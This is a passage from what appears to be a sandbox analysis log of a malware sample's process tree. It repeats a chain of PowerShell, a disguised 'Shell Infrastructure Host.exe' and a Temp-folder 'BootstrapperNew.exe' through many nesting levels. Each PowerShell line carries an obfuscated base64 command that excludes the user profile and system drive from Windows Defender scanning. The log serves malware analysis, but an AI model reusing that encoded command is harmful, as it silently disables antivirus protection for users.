        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        144⤵
        
        PID:5232
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        144⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        144⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        145⤵
        
        PID:4396
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        145⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        145⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        146⤵
        
        PID:6680
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        146⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        146⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        147⤵
        
        PID:5256
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        147⤵
        
        PID:7444
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        147⤵
        
        PID:7308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        148⤵
        
        PID:7000
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        148⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        148⤵
        
        PID:8140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        149⤵
        
        PID:5184
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        149⤵
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        149⤵
        
        PID:7932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        150⤵
        
        PID:1740
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        150⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        150⤵
        
        PID:964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        151⤵
        
        PID:2408
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        151⤵
        
        PID:7784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        151⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        152⤵
        
        PID:3504
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        152⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        152⤵
        
        PID:228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        153⤵
        
        PID:5604
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        153⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        153⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        154⤵
        
        PID:7268
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        154⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        154⤵
        
        PID:6808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        155⤵
        
        PID:6884
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        155⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        155⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        156⤵
        
        PID:7140
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        156⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        156⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        157⤵
        
        PID:5492
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        157⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        157⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        158⤵
        
        PID:5108
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        158⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        158⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        159⤵
        
        PID:3972
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        159⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        159⤵
        
        PID:7472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        160⤵
        
        PID:2372
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        160⤵
        
        PID:7508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        160⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        161⤵
        
        PID:1104
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        161⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        161⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        162⤵
        
        PID:7392
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        162⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        162⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        163⤵
        
        PID:3844
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        163⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        163⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        164⤵
        
        PID:5560
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        164⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        164⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        165⤵
        
        PID:5684
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        165⤵
        
        PID:6616
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        165⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        166⤵
        
        PID:4700
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        166⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        166⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        167⤵
        
        PID:8176
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        167⤵
        
        PID:1228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        167⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        168⤵
        
        PID:6780
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        168⤵
        
        PID:7688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        168⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        169⤵
        
        PID:7612
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        169⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        169⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        170⤵
        
        PID:7512
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        170⤵
        
        PID:7948
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        170⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        171⤵
        
        PID:7944
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        171⤵
        
        PID:4920
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        171⤵
        
        PID:728
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
